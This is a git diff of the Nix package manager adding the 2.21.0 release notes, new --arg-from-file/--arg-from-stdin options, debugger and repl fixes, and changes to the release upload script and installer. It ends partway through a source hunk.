diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md
index 75853ced7..9eb7a3265 100644
--- a/doc/manual/src/quick-start.md
+++ b/doc/manual/src/quick-start.md
@@ -34,7 +34,7 @@ For more in-depth information you are kindly referred to subsequent chapters.
lolcat: command not found
```
-1. Search for more packages on <search.nixos.org> to try them out.
+1. Search for more packages on [search.nixos.org](https://search.nixos.org/) to try them out.
1. Free up storage space:
diff --git a/doc/manual/src/release-notes/rl-2.21.md b/doc/manual/src/release-notes/rl-2.21.md
new file mode 100644
index 000000000..75114f117
--- /dev/null
+++ b/doc/manual/src/release-notes/rl-2.21.md
@@ -0,0 +1,302 @@
+# Release 2.21.0 (2024-03-11)
+
+- Fix a fixed-output derivation sandbox escape (CVE-2024-27297)
+
+ Cooperating Nix derivations could send file descriptors to files in the Nix
+ store to each other via Unix domain sockets in the abstract namespace. This
+ allowed one derivation to modify the output of the other derivation, after Nix
+ has registered the path as "valid" and immutable in the Nix database.
+ In particular, this allowed the output of fixed-output derivations to be
+ modified from their expected content.
+
+ This isn't the case any more.
+
+- CLI options `--arg-from-file` and `--arg-from-stdin` [#10122](https://github.com/NixOS/nix/pull/10122)
+
+ The new CLI option `--arg-from-file` *name* *path* passes the contents
+ of file *path* as a string value via the function argument *name* to a
+ Nix expression. Similarly, the new option `--arg-from-stdin` *name*
+ reads the contents of the string from standard input.
+
+- Concise error printing in `nix repl` [#9928](https://github.com/NixOS/nix/pull/9928)
+
+ Previously, if an element of a list or attribute set threw an error while
+ evaluating, `nix repl` would print the entire error (including source location
+ information) inline. This output was clumsy and difficult to parse:
+
+ ```
+ nix-repl> { err = builtins.throw "uh oh!"; }
+ { err = «error:
+ … while calling the 'throw' builtin
+ at «string»:1:9:
+ 1| { err = builtins.throw "uh oh!"; }
+ | ^
+
+ error: uh oh!»; }
+ ```
+
+ Now, only the error message is displayed, making the output much more readable.
+ ```
+ nix-repl> { err = builtins.throw "uh oh!"; }
+ { err = «error: uh oh!»; }
+ ```
+
+ However, if the whole expression being evaluated throws an error, source
+ locations and (if applicable) a stack trace are printed, just like you'd expect:
+
+ ```
+ nix-repl> builtins.throw "uh oh!"
+ error:
+ … while calling the 'throw' builtin
+ at «string»:1:1:
+ 1| builtins.throw "uh oh!"
+ | ^
+
+ error: uh oh!
+ ```
+
+- `--debugger` can now access bindings from `let` expressions [#8827](https://github.com/NixOS/nix/issues/8827) [#9918](https://github.com/NixOS/nix/pull/9918)
+
+ Breakpoints and errors in the bindings of a `let` expression can now access
+ those bindings in the debugger. Previously, only the body of `let` expressions
+ could access those bindings.
+
+- Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set [#9914](https://github.com/NixOS/nix/pull/9914)
+
+ If the `debugger-on-trace` option is set and `--debugger` is given,
+ `builtins.trace` calls will behave similarly to `builtins.break` and will enter
+ the debug REPL. This is useful for determining where warnings are being emitted
+ from.
+
+- Debugger prints source position information [#9913](https://github.com/NixOS/nix/pull/9913)
+
+ The `--debugger` now prints source location information, instead of the
+ pointers of source location information. Before:
+
+ ```
+ nix-repl> :bt
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ 0x600001522598
+ ```
+
+ After:
+
+ ```
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+ 131|
+ 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+ | ^
+ 133| in
+ ```
+
+- The `--debugger` will start more reliably in `let` expressions and function calls [#6649](https://github.com/NixOS/nix/issues/6649) [#9917](https://github.com/NixOS/nix/pull/9917)
+
+ Previously, if you attempted to evaluate this file with the debugger:
+
+ ```nix
+ let
+ a = builtins.trace "before inner break" (
+ builtins.break "hello"
+ );
+ b = builtins.trace "before outer break" (
+ builtins.break a
+ );
+ in
+ b
+ ```
+
+ Nix would correctly enter the debugger at `builtins.break a`, but if you asked
+ it to `:continue`, it would skip over the `builtins.break "hello"` expression
+ entirely.
+
+ Now, Nix will correctly enter the debugger at both breakpoints.
+
+- Nested debuggers are no longer supported [#9920](https://github.com/NixOS/nix/pull/9920)
+
+ Previously, evaluating an expression that throws an error in the debugger would
+ enter a second, nested debugger:
+
+ ```
+ nix-repl> builtins.throw "what"
+ error: what
+
+
+ Starting REPL to allow you to inspect the current state of the evaluator.
+
+ Welcome to Nix 2.18.1. Type :? for help.
+
+ nix-repl>
+ ```
+
+ Now, it just prints the error message like `nix repl`:
+
+ ```
+ nix-repl> builtins.throw "what"
+ error:
+ … while calling the 'throw' builtin
+ at «string»:1:1:
+ 1| builtins.throw "what"
+ | ^
+
+ error: what
+ ```
+
+- Consistent order of function arguments in printed expressions [#9874](https://github.com/NixOS/nix/pull/9874)
+
+ Function arguments are now printed in lexicographic order rather than the internal, creation-time based symbol order.
+
+- Fix duplicate attribute error positions for `inherit` [#9874](https://github.com/NixOS/nix/pull/9874)
+
+ When an `inherit` caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
+
+- `inherit (x) ...` evaluates `x` only once [#9847](https://github.com/NixOS/nix/pull/9847)
+
+ `inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
+ This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
+
+- Store paths are allowed to start with `.` [#912](https://github.com/NixOS/nix/issues/912) [#9091](https://github.com/NixOS/nix/pull/9091) [#9095](https://github.com/NixOS/nix/pull/9095) [#9120](https://github.com/NixOS/nix/pull/9120) [#9121](https://github.com/NixOS/nix/pull/9121) [#9122](https://github.com/NixOS/nix/pull/9122) [#9130](https://github.com/NixOS/nix/pull/9130) [#9219](https://github.com/NixOS/nix/pull/9219) [#9224](https://github.com/NixOS/nix/pull/9224) [#9867](https://github.com/NixOS/nix/pull/9867)
+
+ Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
+ From now on, leading periods are supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
+
+ Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
+
+- `nix repl` pretty-prints values [#9931](https://github.com/NixOS/nix/pull/9931)
+
+ `nix repl` will now pretty-print values:
+
+ ```
+ {
+ attrs = {
+ a = {
+ b = {
+ c = { };
+ };
+ };
+ };
+ list = [ 1 ];
+ list' = [
+ 1
+ 2
+ 3
+ ];
+ }
+ ```
+
+- Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade` [#10166](https://github.com/NixOS/nix/pull/10166)
+
+ Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expression.
+ For instance:
+
+ ```
+ nix profile remove '.*vim.*'
+ ```
+
+ This would remove all packages that contain `vim` in their name.
+
+ In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes led to unintended behavior. For instance, `python3.1` could match `python311`.
+
+ To avoid unintended behavior, the arguments are now only matching exact names.
+
+ Matching using regular expressions is still possible by using the new `--regex` flag:
+
+ ```
+ nix profile remove --regex '.*vim.*'
+ ```
+
+ One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
+
+ ```
+ nix profile upgrade '.*'
+ ```
+
+ With the introduction of the `--all` flag, this now becomes more straightforward:
+
+ ```
+ nix profile upgrade --all
+ ```
+
+- Visual clutter in `--debugger` is reduced [#9919](https://github.com/NixOS/nix/pull/9919)
+
+ Before:
+ ```
+ info: breakpoint reached
+
+
+ Starting REPL to allow you to inspect the current state of the evaluator.
+
+ Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+ nix-repl> :continue
+ error: uh oh
+
+
+ Starting REPL to allow you to inspect the current state of the evaluator.
+
+ Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
+
+ nix-repl>
+ ```
+
+ After:
+
+ ```
+ info: breakpoint reached
+
+ Nix 2.20.0pre20231222_dirty debugger
+ Type :? for help.
+ nix-repl> :continue
+ error: uh oh
+
+ nix-repl>
+ ```
+
+- Cycle detection in `nix repl` is simpler and more reliable [#8672](https://github.com/NixOS/nix/issues/8672) [#9926](https://github.com/NixOS/nix/pull/9926)
+
+ The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere
+ else values are printed is now simpler and matches the cycle detection in
+ `nix-instantiate --eval` output.
+
+ Before:
+
+ ```
+ nix eval --expr 'let self = { inherit self; }; in self'
+ { self = { self = «repeated»; }; }
+ ```
+
+ After:
+
+ ```
+ { self = «repeated»; }
+ ```
+
+- In the debugger, `while evaluating the attribute` errors now include position information [#9915](https://github.com/NixOS/nix/pull/9915)
+
+ Before:
+
+ ```
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ 0x600001522598
+ ```
+
+ After:
+
+ ```
+ 0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+ /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+ 131|
+ 132| bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+ | ^
+ 133| in
+ ```
+
+- Stack size is increased on macOS [#9860](https://github.com/NixOS/nix/pull/9860)
+
+ Previously, Nix would set the stack size to 64MiB on Linux, but would leave the
+ stack size set to the default (approximately 8MiB) on macOS. Now, the stack
+ size is correctly set to 64MiB on macOS as well, which should reduce stack
+ overflow segfaults in deeply-recursive Nix expressions.
+
diff --git a/flake.nix b/flake.nix
index 42aaace67..89b928e83 100644
--- a/flake.nix
+++ b/flake.nix
@@ -31,7 +31,6 @@
crossSystems = [
"armv6l-unknown-linux-gnueabihf"
"armv7l-unknown-linux-gnueabihf"
- "x86_64-unknown-freebsd13"
"x86_64-unknown-netbsd"
];
@@ -299,8 +298,11 @@
''
type -p nix-env
# Note: we're filtering out nixos-install-tools because https://github.com/NixOS/nixpkgs/pull/153594#issuecomment-1020530593.
- time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
- [[ $(sha1sum < packages | cut -c1-40) = ff451c521e61e4fe72bdbe2d0ca5d1809affa733 ]]
+ (
+ set -x
+ time nix-env --store dummy:// -f ${nixpkgs-regression} -qaP --drv-path | sort | grep -v nixos-install-tools > packages
+ [[ $(sha1sum < packages | cut -c1-40) = e01b031fc9785a572a38be6bc473957e3b6faad7 ]]
+ )
mkdir $out
'';
@@ -341,7 +343,6 @@
checks = forAllSystems (system: {
binaryTarball = self.hydraJobs.binaryTarball.${system};
- perlBindings = self.hydraJobs.perlBindings.${system};
installTests = self.hydraJobs.installTests.${system};
nixpkgsLibTests = self.hydraJobs.tests.nixpkgsLibTests.${system};
rl-next =
@@ -351,6 +352,11 @@
'';
} // (lib.optionalAttrs (builtins.elem system linux64BitSystems)) {
dockerImage = self.hydraJobs.dockerImage.${system};
+ } // (lib.optionalAttrs (!(builtins.elem system linux32BitSystems))) {
+ # Some perl dependencies are broken on i686-linux.
+ # Since the support is only best-effort there, disable the perl
+ # bindings
+ perlBindings = self.hydraJobs.perlBindings.${system};
});
packages = forAllSystems (system: rec {
diff --git a/maintainers/upload-release.pl b/maintainers/upload-release.pl
index 4e2c379f0..f2830a3af 100755
--- a/maintainers/upload-release.pl
+++ b/maintainers/upload-release.pl
@@ -11,6 +11,8 @@ use JSON::PP;
use LWP::UserAgent;
use Net::Amazon::S3;
+delete $ENV{'shell'}; # shut up a LWP::UserAgent.pm warning
+
my $evalId = $ARGV[0] or die "Usage: $0 EVAL-ID\n";
my $releasesBucketName = "nix-releases";
@@ -36,9 +38,9 @@ sub fetch {
my $evalUrl = "https://hydra.nixos.org/eval/$evalId";
my $evalInfo = decode_json(fetch($evalUrl, 'application/json'));
#print Dumper($evalInfo);
-my $flakeUrl = $evalInfo->{flake} or die;
-my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die);
-my $nixRev = $flakeInfo->{revision} or die;
+my $flakeUrl = $evalInfo->{flake};
+my $flakeInfo = decode_json(`nix flake metadata --json "$flakeUrl"` or die) if $flakeUrl;
+my $nixRev = ($flakeInfo ? $flakeInfo->{revision} : $evalInfo->{jobsetevalinputs}->{nix}->{revision}) or die;
my $buildInfo = decode_json(fetch("$evalUrl/job/build.x86_64-linux", 'application/json'));
#print Dumper($buildInfo);
@@ -83,12 +85,19 @@ my $channelsBucket = $s3_us->bucket($channelsBucketName) or die;
sub getStorePath {
my ($jobName, $output) = @_;
my $buildInfo = decode_json(fetch("$evalUrl/job/$jobName", 'application/json'));
- return $buildInfo->{buildoutputs}->{$output or "out"}->{path} or die "cannot get store path for '$jobName'";
+ return $buildInfo->{buildoutputs}->{$output or "out"}->{path} // die "cannot get store path for '$jobName'";
}
sub copyManual {
- my $manual = getStorePath("build.x86_64-linux", "doc");
- print "$manual\n";
+ my $manual;
+ eval {
+ $manual = getStorePath("build.x86_64-linux", "doc");
+ };
+ if ($@) {
+ warn "$@";
+ return;
+ }
+ print "Manual: $manual\n";
my $manualNar = "$tmpDir/$releaseName-manual.nar.xz";
print "$manualNar\n";
@@ -154,19 +163,33 @@ downloadFile("binaryTarball.x86_64-linux", "1");
downloadFile("binaryTarball.aarch64-linux", "1");
downloadFile("binaryTarball.x86_64-darwin", "1");
downloadFile("binaryTarball.aarch64-darwin", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
-downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+eval {
+ downloadFile("binaryTarballCross.x86_64-linux.armv6l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
+eval {
+ downloadFile("binaryTarballCross.x86_64-linux.armv7l-unknown-linux-gnueabihf", "1");
+};
+warn "$@" if $@;
downloadFile("installerScript", "1");
# Upload docker images to dockerhub.
my $dockerManifest = "";
my $dockerManifestLatest = "";
+my $haveDocker = 0;
for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
my $system = $platforms->[0];
my $dockerPlatform = $platforms->[1];
my $fn = "nix-$version-docker-image-$dockerPlatform.tar.gz";
- downloadFile("dockerImage.$system", "1", $fn);
+ eval {
+ downloadFile("dockerImage.$system", "1", $fn);
+ };
+ if ($@) {
+ warn "$@" if $@;
+ next;
+ }
+ $haveDocker = 1;
print STDERR "loading docker image for $dockerPlatform...\n";
system("docker load -i $tmpDir/$fn") == 0 or die;
@@ -194,21 +217,23 @@ for my $platforms (["x86_64-linux", "amd64"], ["aarch64-linux", "arm64"]) {
$dockerManifestLatest .= " --amend $latestTag"
}
-print STDERR "creating multi-platform docker manifest...\n";
-system("docker manifest rm nixos/nix:$version");
-system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
-if ($isLatest) {
- print STDERR "creating latest multi-platform docker manifest...\n";
- system("docker manifest rm nixos/nix:latest");
- system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
-}
+if ($haveDocker) {
+ print STDERR "creating multi-platform docker manifest...\n";
+ system("docker manifest rm nixos/nix:$version");
+ system("docker manifest create nixos/nix:$version $dockerManifest") == 0 or die;
+ if ($isLatest) {
+ print STDERR "creating latest multi-platform docker manifest...\n";
+ system("docker manifest rm nixos/nix:latest");
+ system("docker manifest create nixos/nix:latest $dockerManifestLatest") == 0 or die;
+ }
-print STDERR "pushing multi-platform docker manifest...\n";
-system("docker manifest push nixos/nix:$version") == 0 or die;
+ print STDERR "pushing multi-platform docker manifest...\n";
+ system("docker manifest push nixos/nix:$version") == 0 or die;
-if ($isLatest) {
- print STDERR "pushing latest multi-platform docker manifest...\n";
- system("docker manifest push nixos/nix:latest") == 0 or die;
+ if ($isLatest) {
+ print STDERR "pushing latest multi-platform docker manifest...\n";
+ system("docker manifest push nixos/nix:latest") == 0 or die;
+ }
}
# Upload nix-fallback-paths.nix.
diff --git a/mk/cxx-big-literal.mk b/mk/cxx-big-literal.mk
index 85365df8e..d64a171c8 100644
--- a/mk/cxx-big-literal.mk
+++ b/mk/cxx-big-literal.mk
@@ -1,5 +1,5 @@
%.gen.hh: %
- @echo 'R"foo(' >> $@.tmp
+ @echo 'R"__NIX_STR(' >> $@.tmp
$(trace-gen) cat $< >> $@.tmp
- @echo ')foo"' >> $@.tmp
+ @echo ')__NIX_STR"' >> $@.tmp
@mv $@.tmp $@
diff --git a/package.nix b/package.nix
index 20796a386..7d9a39771 100644
--- a/package.nix
+++ b/package.nix
@@ -24,6 +24,7 @@
, libgit2
, libseccomp
, libsodium
+, man
, lowdown
, mdbook
, mdbook-linkcheck
@@ -213,6 +214,7 @@ in {
git
mercurial
openssh
+ man # for testing `nix-* --help`
] ++ lib.optionals (doInstallCheck || enableManual) [
jq # Also for custom mdBook preprocessor.
] ++ lib.optional stdenv.hostPlatform.isLinux util-linux
@@ -341,15 +343,22 @@ in {
# Work around weird bug where it doesn't think there is a Makefile.
installCheckPhase = if (!doBuild && doInstallCheck) then ''
+ runHook preInstallCheck
mkdir -p src/nix-channel
make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES
'' else null;
# Needed for tests if we are not doing a build, but testing existing
# built Nix.
- preInstallCheck = lib.optionalString (! doBuild) ''
- mkdir -p src/nix-channel
- '';
+ preInstallCheck =
+ lib.optionalString (! doBuild) ''
+ mkdir -p src/nix-channel
+ ''
+ # See https://github.com/NixOS/nix/issues/2523
+ # Occurs often in tests since https://github.com/NixOS/nix/pull/9900
+ + lib.optionalString stdenv.hostPlatform.isDarwin ''
+ export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
+ '';
separateDebugInfo = !stdenv.hostPlatform.isStatic;
diff --git a/scripts/install-multi-user.sh b/scripts/install-multi-user.sh
index 1dbb93bf9..ad3ee8881 100644
--- a/scripts/install-multi-user.sh
+++ b/scripts/install-multi-user.sh
@@ -58,31 +58,6 @@ readonly EXTRACTED_NIX_PATH="$(dirname "$0")"
readonly ROOT_HOME=~root
-readonly PROXY_ENVIRONMENT_VARIABLES=(
- http_proxy
- https_proxy
- ftp_proxy
- no_proxy
- HTTP_PROXY
- HTTPS_PROXY
- FTP_PROXY
- NO_PROXY
-)
-
-SUDO_EXTRA_ENVIRONMENT_VARIABLES=()
-
-setup_sudo_extra_environment_variables() {
- local i=${#SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}
- for variable in "${PROXY_ENVIRONMENT_VARIABLES[@]}"; do
- if [ "x${!variable:-}" != "x" ]; then
- SUDO_EXTRA_ENVIRONMENT_VARIABLES[i]="$variable=${!variable}"
- i=$((i + 1))
- fi
- done
-}
-
-setup_sudo_extra_environment_variables
-
if [ -t 0 ] && [ -z "${NIX_INSTALLER_YES:-}" ]; then
readonly IS_HEADLESS='no'
else
@@ -386,7 +361,7 @@ _sudo() {
if is_root; then
env "$@"
else
- sudo "${SUDO_EXTRA_ENVIRONMENT_VARIABLES[@]}" "$@"
+ sudo "$@"
fi
}
diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 444ff81c9..b87bbbc27 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -20,7 +20,7 @@ MixEvalArgs::MixEvalArgs()
.description = "Pass the value *expr* as the argument *name* to Nix functions.",
.category = category,
.labels = {"name", "expr"},
- .handler = {[&](std::string name, std::string expr) { autoArgs[name] = 'E' + expr; }}
+ .handler = {[&](std::string name, std::string expr) { autoArgs.insert_or_assign(name, AutoArg{AutoArgExpr(expr)}); }}
});
addFlag({
@@ -28,7 +28,24 @@ MixEvalArgs::MixEvalArgs()
.description = "Pass the string *string* as the argument *name* to Nix functions.",
.category = category,
.labels = {"name", "string"},
- .handler = {[&](std::string name, std::string s) { autoArgs[name] = 'S' + s; }},
+ .handler = {[&](std::string name, std::string s) { autoArgs.insert_or_assign(name, AutoArg{AutoArgString(s)}); }},
+ });
+
+ addFlag({
+ .longName = "arg-from-file",
+ .description = "Pass the contents of file *path* as the argument *name* to Nix functions.",
+ .category = category,
+ .labels = {"name", "path"},
+ .handler = {[&](std::string name, std::string path) { autoArgs.insert_or_assign(name, AutoArg{AutoArgFile(path)}); }},
+ .completer = completePath
+ });
+
+ addFlag({
+ .longName = "arg-from-stdin",
+ .description = "Pass the contents of stdin as the argument *name* to Nix functions.",
+ .category = category,
+ .labels = {"name"},
+ .handler = {[&](std::string name) { autoArgs.insert_or_assign(name, AutoArg{AutoArgStdin{}}); }},
});
addFlag({
@@ -154,13 +171,23 @@ MixEvalArgs::MixEvalArgs()
Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
{
auto res = state.buildBindings(autoArgs.size());
- for (auto & i : autoArgs) {
+ for (auto & [name, arg] : autoArgs) {
auto v = state.allocValue();
- if (i.second[0] == 'E')
- state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath(".")));
- else
- v->mkString(((std::string_view) i.second).substr(1));
- res.insert(state.symbols.create(i.first), v);
+ std::visit(overloaded {
+ [&](const AutoArgExpr & arg) {
+ state.mkThunk_(*v, state.parseExprFromString(arg.expr, state.rootPath(".")));
+ },
+ [&](const AutoArgString & arg) {
+ v->mkString(arg.s);
+ },
+ [&](const AutoArgFile & arg) {
+ v->mkString(readFile(arg.path));
+ },
+ [&](const AutoArgStdin & arg) {
+ v->mkString(readFile(STDIN_FILENO));
+ }
+ }, arg);
+ res.insert(state.symbols.create(name), v);
}
return res.finish();
}
diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh
index 2eb63e15d..25ce5b9da 100644
--- a/src/libcmd/common-eval-args.hh
+++ b/src/libcmd/common-eval-args.hh
@@ -6,6 +6,8 @@
#include "common-args.hh"
#include "search-path.hh"
+#include <filesystem>
+
namespace nix {
class Store;
@@ -26,7 +28,14 @@ struct MixEvalArgs : virtual Args, virtual MixRepair
std::optional<std::string> evalStoreUrl;
private:
- std::map<std::string, std::string> autoArgs;
+ struct AutoArgExpr { std::string expr; };
+ struct AutoArgString { std::string s; };
+ struct AutoArgFile { std::filesystem::path path; };
+ struct AutoArgStdin { };
+
+ using AutoArg = std::variant<AutoArgExpr, AutoArgString, AutoArgFile, AutoArgStdin>;
+
+ std::map<std::string, AutoArg> autoArgs;
};
SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir = nullptr);
diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc
index 16d25d3cf..6db9bf9a1 100644
--- a/src/libcmd/installables.cc
+++ b/src/libcmd/installables.cc
@@ -21,6 +21,7 @@
#include "url.hh"
#include "registry.hh"
#include "build-result.hh"
+#include "fs-input-accessor.hh"
#include
#include
@@ -146,7 +147,7 @@ MixFlakeOptions::MixFlakeOptions()
.category = category,
.labels = {"flake-lock-path"},
.handler = {[&](std::string lockFilePath) {
- lockFlags.referenceLockFilePath = lockFilePath;
+ lockFlags.referenceLockFilePath = getUnfilteredRootPath(CanonPath(absPath(lockFilePath)));
}},
.completer = completePath
});
@@ -442,10 +443,10 @@ ref<eval_cache::EvalCache> openEvalCache(
EvalState & state,
std::shared_ptr<flake::LockedFlake> lockedFlake)
{
- auto fingerprint = lockedFlake->getFingerprint();
+ auto fingerprint = lockedFlake->getFingerprint(state.store);
return make_ref<nix::eval_cache::EvalCache>(
evalSettings.useEvalCache && evalSettings.pureEval
- ? std::optional { std::cref(fingerprint) }
+ ? fingerprint
: std::nullopt,
state,
[&state, lockedFlake]()
diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8b83608fa..a79d7c482 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -123,7 +123,8 @@ struct NixRepl
.force = true,
.derivationPaths = true,
.maxDepth = maxDepth,
- .prettyIndent = 2
+ .prettyIndent = 2,
+ .errors = ErrorPrintBehavior::ThrowTopLevel,
});
}
};
@@ -336,13 +337,7 @@ ReplExitStatus NixRepl::mainLoop()
printMsg(lvlError, e.msg());
}
} catch (EvalError & e) {
- // in debugger mode, an EvalError should trigger another repl session.
- // when that session returns the exception will land here. No need to show it again;
- // show the error for this repl session instead.
- if (state->debugRepl && !state->debugTraces.empty())
- showDebugTrace(std::cout, state->positions, state->debugTraces.front());
- else
- printMsg(lvlError, e.msg());
+ printMsg(lvlError, e.msg());
} catch (Error & e) {
printMsg(lvlError, e.msg());
} catch (Interrupted & e) {
@@ -548,6 +543,7 @@ ProcessLineResult NixRepl::processLine(std::string line)
<< " :l, :load <path> Load Nix expression and add it to scope\n"
<< " :lf, :load-flake [<ref>] Load Nix flake and add it to scope\n"
<< " :p, :print <expr> Evaluate and print expression recursively\n"
+ << " Strings are printed directly, without escaping.\n"
<< " :q, :quit Exit nix-repl\n"
<< " :r, :reload Reload all files\n"
<< " :sh <expr> Build dependencies of derivation, then start\n"
@@ -755,7 +751,11 @@ ProcessLineResult NixRepl::processLine(std::string line)
else if (command == ":p" || command == ":print") {
Value v;
evalString(arg, v);
- printValue(std::cout, v);
+ if (v.type() == nString) {
+ std::cout << v.string_view();
+ } else {
+ printValue(std::cout, v);
+ }
std::cout << std::endl;
}
diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index b5783d28f..c5581b9ff 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -21,11 +21,24 @@ struct EvalSettings : Config
Setting<Strings> nixPath{
this, getDefaultNixPath(), "nix-path",
R"(
- List of directories to be searched for `<...>` file references
+ List of search paths to use for [lookup path](@docroot@/language/constructs/lookup-path.md) resolution.
+ This setting determines the value of
+ [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath) and can be used with [`builtins.findFile`](@docroot@/language/builtin-constants.md#builtins-findFile).
- In particular, outside of [pure evaluation mode](#conf-pure-eval), this determines the value of
- [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath).
- )"};
+ The default value is
+
+ ```
+ $HOME/.nix-defexpr/channels
+ nixpkgs=$NIX_STATE_DIR/profiles/per-user/root/channels/nixpkgs
+ $NIX_STATE_DIR/profiles/per-user/root/channels
+ ```
+
+ It can be overridden with the [`NIX_PATH` environment variable](@docroot@/command-ref/env-common.md#env-NIX_PATH) or the [`-I` command line option](@docroot@/command-ref/opt-common.md#opt-I).
+
+ > **Note**
+ >
+ > If [pure evaluation](#conf-pure-eval) is enabled, `nixPath` evaluates to the empty list `[ ]`.
+ )", {}, false};
Setting<std::string> currentSystem{
this, "", "eval-system",
@@ -55,8 +68,6 @@ struct EvalSettings : Config
[`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath),
or to URIs outside of
[`allowed-uris`](@docroot@/command-ref/conf-file.md#conf-allowed-uris).
-
- Also the default value for [`nix-path`](#conf-nix-path) is ignored, such that only explicitly set search path entries are taken into account.
)"};
Setting<bool> pureEval{this, false, "pure-eval",
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index f2bbf20bb..bbccfcd29 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -762,10 +762,24 @@ std::unique_ptr<ValMap> mapStaticEnvBindings(const SymbolTable & st, const Stati
return vm;
}
+/**
+ * Sets `inDebugger` to true on construction and false on destruction.
+ */
+class DebuggerGuard {
+ bool & inDebugger;
+public:
+ DebuggerGuard(bool & inDebugger) : inDebugger(inDebugger) {
+ inDebugger = true;
+ }
+ ~DebuggerGuard() {
+ inDebugger = false;
+ }
+};
+
void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & expr)
{
- // double check we've got the debugRepl function pointer.
- if (!debugRepl)
+ // Make sure we have a debugger to run and we're not already in a debugger.
+ if (!debugRepl || inDebugger)
return;
auto dts =
@@ -792,6 +806,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
auto se = getStaticEnv(expr);
if (se) {
auto vm = mapStaticEnvBindings(symbols, *se.get(), env);
+ DebuggerGuard _guard(inDebugger);
auto exitStatus = (debugRepl)(ref<EvalState>(shared_from_this()), *vm);
switch (exitStatus) {
case ReplExitStatus::QuitAll:
@@ -934,12 +949,11 @@ void EvalState::mkThunk_(Value & v, Expr * expr)
void EvalState::mkPos(Value & v, PosIdx p)
{
- auto pos = positions[p];
- if (auto path = std::get_if(&pos.origin)) {
+ auto origin = positions.originOf(p);
+ if (auto path = std::get_if(&origin)) {
auto attrs = buildBindings(3);
attrs.alloc(sFile).mkString(path->path.abs());
- attrs.alloc(sLine).mkInt(pos.line);
- attrs.alloc(sColumn).mkInt(pos.column);
+ makePositionThunks(*this, p, attrs.alloc(sLine), attrs.alloc(sColumn));
v.mkAttrs(attrs);
} else
v.mkNull();
@@ -2762,9 +2776,12 @@ Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr<StaticEnv> & staticEnv)
{
- auto s = make_ref<std::string>(std::move(s_));
- s->append("\0\0", 2);
- return parse(s->data(), s->size(), Pos::String{.source = s}, basePath, staticEnv);
+ // NOTE this method (and parseStdin) must take care to *fully copy* their input
+ // into their respective Pos::Origin until the parser stops overwriting its input
+ // data.
+ auto s = make_ref<std::string>(s_);
+ s_.append("\0\0", 2);
+ return parse(s_.data(), s_.size(), Pos::String{.source = s}, basePath, staticEnv);
}
@@ -2776,12 +2793,15 @@ Expr * EvalState::parseExprFromString(std::string s, const SourcePath & basePath
Expr * EvalState::parseStdin()
{
+ // NOTE this method (and parseExprFromString) must take care to *fully copy* their
+ // input into their respective Pos::Origin until the parser stops overwriting its
+ // input data.
//Activity act(*logger, lvlTalkative, "parsing standard input");
auto buffer = drainFD(0);
// drainFD should have left some extra space for terminators
